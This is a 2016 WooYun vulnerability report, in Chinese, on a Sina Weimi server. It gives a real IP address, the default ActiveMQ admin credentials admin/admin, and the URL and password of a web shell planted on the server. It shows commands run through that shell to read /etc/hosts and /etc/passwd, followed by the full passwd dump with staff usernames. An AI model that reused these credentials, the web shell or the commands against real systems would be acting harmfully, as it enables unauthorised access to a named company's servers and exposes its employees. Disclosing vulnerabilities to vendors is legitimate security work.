漏洞概要
关注数(24)
关注此漏洞
漏洞标题:新浪微米某系统弱口令getshell/root权限/内网环境
相关厂商:新浪
提交时间:2016-06-29 13:58
修复时间:2016-07-04 10:30
公开时间:2016-07-04 10:30
漏洞类型:命令执行
危害等级:高
自评Rank:12
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
无
漏洞详情
披露状态:
2016-06-29: 细节已通知厂商并且等待厂商处理中
2016-07-04: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
rt
详细说明:
看到都提给sina了 于是我也跟着众神们的节奏来一发
http://183.136.160.234:8161/
ActionMQ 弱口令 admin admin
http://183.136.160.234:8161/admin/test/sex.jsp
http://183.136.160.234:8161/admin/test/sex.jsp?pwd=023&cmd=cat%20/etc/hosts
应该是直入内网了。。
http://183.136.160.234:8161/admin/test/sex.jsp?pwd=023&cmd=cat%20/etc/passwd
就证明这么多。
漏洞证明:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
hacluster:x:499:499:cluster user:/home/hacluster:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
cimsrvr:x:134:134:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rtkit:x:498:495:RealtimeKit:/proc:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
saslauth:x:497:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
ricci:x:140:140:ricci daemon user:/var/lib/ricci:/sbin/nologin
tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dhcpd:x:177:177:DHCP server:/:/sbin/nologin
memcached:x:496:493:Memcached daemon:/var/run/memcached:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
pulse:x:495:492:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
stap-server:x:155:155:Systemtap Compile Server:/var/lib/stap-server:/sbin/nologin
xguest:x:500:500:Guest:/home/xguest:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
quagga:x:92:92:Quagga routing suite:/var/run/quagga:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
arpwatch:x:77:77::/var/lib/arpwatch:/sbin/nologin
luci:x:141:141:luci high availability management application:/var/lib/luci:/sbin/nologin
ident:x:98:98::/:/sbin/nologin
uuidd:x:494:488:UUID generator helper daemon:/var/lib/libuuid:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
radiusd:x:95:95:radiusd user:/home/radiusd:/sbin/nologin
yuanming:x:501:501::/home/yuanming:/bin/bash
haibo:x:502:502::/home/haibo:/bin/bash
gaozhi:x:503:503::/home/gaozhi:/bin/bash
hanjian:x:504:504::/home/hanjian:/bin/bash
liuxin:x:505:505::/home/liuxin:/bin/bash
yiqian:x:506:506::/home/yiqian:/bin/bash
yifeng:x:507:507::/home/yifeng:/bin/bash
www:x:508:508::/home/www:/bin/bash
couchbase:x:493:486:couchbase system user:/opt/couchbase:/bin/sh
nginx:x:492:485:Nginx web server:/var/lib/nginx:/sbin/nologin
td-agent:x:491:484:td-agent:/var/lib/td-agent:/sbin/nologin
yongrong:x:509:509::/home/yongrong:/bin/bash
baoku:x:510:10::/home/baoku:/bin/bash
yuwenlong:x:511:511::/home/yuwenlong:/bin/bash
jizheng:x:512:10::/home/jizheng:/bin/bash
zhangjianghao:x:513:513::/home/zhangjianghao:/bin/bash
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2016-07-04 10:30
厂商回复:
请直接提交给微米官方联系修复。
最新状态:
暂无
漏洞评价:
评价
-
2016-06-30 15:16 |
洋葱(乌云厂商)
-
2016-06-30 15:27 |
j14n ( 普通白帽子 | Rank:2345 漏洞数:421 )